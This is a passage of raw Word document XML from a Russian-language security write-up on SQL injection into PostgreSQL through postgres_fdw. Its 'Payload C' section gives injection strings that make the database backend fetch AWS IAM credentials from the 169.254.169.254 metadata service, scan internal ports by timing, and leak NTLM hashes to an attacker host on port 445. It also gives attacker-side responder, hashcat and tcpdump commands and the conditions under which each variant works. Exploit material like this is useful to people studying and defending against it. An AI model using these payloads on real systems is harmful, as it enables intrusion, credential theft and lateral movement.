    <w:p w14:paraId="4CFFCD59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>options { querylog yes; };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75A1E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Или коллектор поверх tcpdump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D0FB34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn -s0 'udp port 53' -w queries.pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741BD07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — TCP/SSRF (cloud metadata / port scan / NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD85CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Один payload-каркас с тремя вариантами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все три эксплуатируют один и тот же механизм (исходящий TCP-коннект от backend postgres), но дают три разные под-цели атаки. Атакующий выбирает вариант под среду жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0284D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `req.host`, вариант 1 — cloud metadata `169.254.169.254`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE88D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>169.254.169.254', port '80', dbname 'latest/meta-data/iam/security-credentials/'); CREATE USER MAPPING FOR CURRENT_USER SERVER app_src OPTIONS (user 'x', password 'x'); CREATE FOREIGN TABLE t_meta(c text) SERVER app_src OPTIONS (table_name 'iam'); PERFORM * FROM t_meta; END $$; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC37EA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Варианты 2 и 3 — меняется только первая строка (host/port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDDFC58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Вариант 2 — internal port scan (Redis на 6379, ElasticSearch 9200, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6226A098" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10.0.0.5', port '6379', dbname 'x'); ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBE53F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC68FA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Вариант 3 — NTLM capture (только Windows-PG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E81FDEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker.tld', port '445', dbname 'x'); ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF6EAB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит (вариант 1, IMDSv1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96B610" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D33FE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER IF NOT EXISTS app_src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4774AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59542967" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host '169.254.169.254', port '80',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5275E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         dbname 'latest/meta-data/iam/security-credentials/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283F78D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER MAPPING FOR CURRENT_USER SERVER app_src OPTIONS (user 'x', password 'x');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC8AC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE t_meta(c text) SERVER app_src OPTIONS (table_name 'iam');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B23E03D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PERFORM * FROM t_meta;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5E51A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $$; --', port '5432', dbname 'main'); END $$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6EAD03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F01AEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Вариант 1 — слушать ничего не нужно, ответ IMDS придёт обратно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D456024" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#            через postgres_fdw в текст ошибки backend-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19863CD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Вариант 2 — port scan через тайминг ответа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7DB97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#   open     → ~100 ms (handshake/RST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D101C80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#   closed   → ~10 ms  (immediate RST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2242E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#   filtered → ≥30 sec (firewall timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236C6644" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Вариант 3 — Responder на интерфейсе атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BFED8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo responder -I eth0 -wF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C6A87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Три под-цели SSRF, у каждой своя применимость:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF9083" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloud metadata (`169.254.169.254`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — IMDSv1 без header-protection: AWS EC2 до 2024, GCP Compute Engine, Azure при определённых конфигах. Возвращает IAM-credentials (AWS temporary keys), instance metadata, user-data. Применимо: self-hosted PG в IaaS, AWS RDS до миграции на IMDSv2, любые managed-PG в VPC с включённым metadata access. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не работает:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IMDSv2 (требует PUT-запрос с заголовком </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>X-aws-ec2-metadata-token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> делает только GET), Cloud SQL/Supabase (network egress на link-local закрыт).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB7D8C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal port scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backend postgres коннектится на любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host:port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в private network. Open/filtered/closed различаются по тайминго ответа: open ≈ 100 ms, closed ≈ 10 ms (RST), filtered ≥ 30 сек (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или TCP keepalive). Применимо: PG-хост в кластере с доступом к internal services (Redis 6379, Elasticsearch 9200, Kubernetes API 6443, internal HTTP-API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B03B59C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTLM capture (Windows)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — postgres коннектится на attacker SMB-share (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port 445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Windows-PG-процесс под доменной учёткой шлёт NTLM challenge → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на стороне атакующего захватывает NetNTLMv2 hash → offline-cracking (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hashcat -m 5600</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Применимо: PostgreSQL on Windows + Active Directory. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не работает:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG on Linux/macOS — нет SMB-клиента в libpq, коннект к 445 просто упадёт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B1CC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Поверх трёх под-целей — DNS-эксфильтрация (общая, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BE8EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D3450E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обёртка над libpq, делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQconnectdb()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под капотом, идентично </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до TCP-handshake → DNS-канал работает даже если egress firewall режет outbound TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D0114" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> открывает коннект — это только метаданные в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_foreign_table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Коннект открывается на первом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PERFORM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к foreign-таблице. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PERFORM * FROM t_ev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload обязателен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF31AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN ... END $$;</w:t>
      </w:r>
